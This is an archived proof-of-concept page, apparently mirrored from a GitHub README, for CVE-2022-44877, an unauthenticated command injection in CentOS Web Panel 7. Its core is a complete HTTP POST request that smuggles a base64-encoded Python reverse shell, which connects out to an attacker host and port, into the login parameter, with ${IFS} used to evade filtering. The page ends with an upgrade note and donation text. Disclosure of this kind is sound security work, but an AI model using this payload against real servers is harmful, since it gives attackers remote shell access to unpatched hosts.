Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-44877 PoC — CentOS Web Panel 操作系统命令注入漏洞

Source
https://github.com/numanturle/CVE-2022-44877
Associated Vulnerability
Title:CentOS Web Panel 操作系统命令注入漏洞 (CVE-2022-44877)
Description:CentOS Web Panel(CWP)是Control Web Panel社区的一款免费的虚拟主机控制面板。 Centos Web Panel 7 v0.9.8.1147之前版本存在安全漏洞,该漏洞源于/login/index.php组件存在问题,允许未经身份验证的攻击者通过精心设计的HTTP请求执行任意系统命令。
Readme
# Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877

```
[+] Centos Web Panel 7 Unauthenticated Remote Code Execution
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
```
[![IMAGE ALT TEXT HERE](https://img.youtube.com/vi/kiLfSvc1SYY/0.jpg)](https://www.youtube.com/watch?v=kiLfSvc1SYY)


## Description

https://www.gnu.org/software/bash/manual/html_node/Double-Quotes.html

https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html

```
➜  CVE-2022-44877 echo "example_log" >> log
➜  CVE-2022-44877 cat log
example_log
➜  CVE-2022-44877 echo "example_log $(whoami)" >> log
➜  CVE-2022-44877 cat log
example_log
example_log root
➜  CVE-2022-44877
```

![img](https://github.com/numanturle/CVE-2022-44877/blob/main/1.png?raw=true)

![img](https://github.com/numanturle/CVE-2022-44877/blob/main/2.png?raw=true)



## Proof of concept:
```
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
```

## Solution

Upgrade to CWP7 current version.
File Snapshot

 [4.0K]  /data/pocs/94ff4f8265f0289214922fc20a3c3e8d8210a51c
├── [654K]  1.png
├── [758K]  2.png
└── [2.1K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.